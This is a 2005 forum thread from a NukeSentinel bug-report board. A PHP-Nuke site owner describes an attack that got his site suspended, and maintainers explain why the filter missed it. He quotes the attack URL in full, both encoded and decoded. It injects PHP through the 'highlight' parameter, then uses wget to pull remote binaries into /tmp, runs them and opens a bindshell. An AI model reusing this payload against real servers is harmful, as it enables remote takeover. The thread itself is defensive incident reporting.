Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) Bug Reports
Author Message
Pepper
New Member
New Member



Joined: Mar 16, 2005
Posts: 1

PostPosted: Wed Mar 16, 2005 1:06 pm Reply with quote

Not entirely clear I should be posting this in this forum, but I am running Sentinel 2.20 (upgraded from 2.13 after this script got past it, but reproduced it on 2.20 as well).

My hosting provider suspended my site today after somebody used the following URL to run wget commands on their server:

/main/modules.php?name=Forums&file=viewtopic&t=6034&start=10&highlight=%2527%252Esystem%28%24%48%54%54%50%5F%47%45%54%5f%56%41%52%53%5B%6C%6F%6C%5D%2529%252e%2527&lol=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%69%63%6B%65%79%73%6D%74%6E%2E%63%6F%6D%2F%6E%75%6B%65%2F%68%6F%73%74%3B%63%68%6D%6F%64%20%2B%78%20%68%6F%73%74%3B%2E%2F%68%6F%73%74%3B%72%6D%20%2D%72%66%20%68%6F%73%74%3B%77%67%65%74%20%68%68%74%74%70%3A%2F%2F%68%6F%6D%65%2E%61%72%63%6F%72%2E%64%65%2F%71%61%75%74%68%39%2F%62%69%6E%64%69%74%3B%6D%76%20%62%69%6E%64%69%74%20%68%68%74%74%70%64%3B%2E%2F%68%68%74%74%70%64%20%31%74%70%64%20%31%32%34%38%3B%72%6D%20%2D%72%66%20%68%68%74%74%70%64%3B%20%65%63%68%6F%20%5F%45%4E%44%5F

I ran this through urldecode - TWICE - to get the following code:
/main/modules.php?name=Forums&file=viewtopic&t=6034&start=10&highlight='.system($HTTP_GET_VARS[lol]).'&lol=echo _START_; cd /tmp;wget [ Only registered users can see links on this board! Get registered or login! ] x host;./host;rm -rf host;wget [ Only registered users can see links on this board! Get registered or login! ] bindit hhttpd;./hhttpd 1tpd 1248;rm -rf hhttpd; echo _END_

I previously needed to remove the 'highlight' keyword check from the santy worm checking otherwise my forums break left right and center, but I do have the relevant .htaccess commands in place as well.

Should sentinel have caught this, or is this a new attack, or am I missing something else?
 
View user's profile Send private message
BobMarion
Former Admin in Good Standing



Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)

PostPosted: Thu Mar 17, 2005 2:15 am Reply with quote

With the highlight removed NukeSentinel does not stop this but I will find a way to filter it Smile

_________________
Bob Marion
Codito Ergo Sum
http://www.nukescripts.net

Last edited by BobMarion on Thu Mar 17, 2005 12:59 pm; edited 1 time in total 
View user's profile Send private message Send e-mail Visit poster's website
chatserv
Member Emeritus



Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico

PostPosted: Thu Mar 17, 2005 12:38 pm Reply with quote

Most likely because of:
$highlight = urlencode($HTTP_GET_VARS['highlight']);
 
View user's profile Send private message Visit poster's website
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) Bug Reports

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©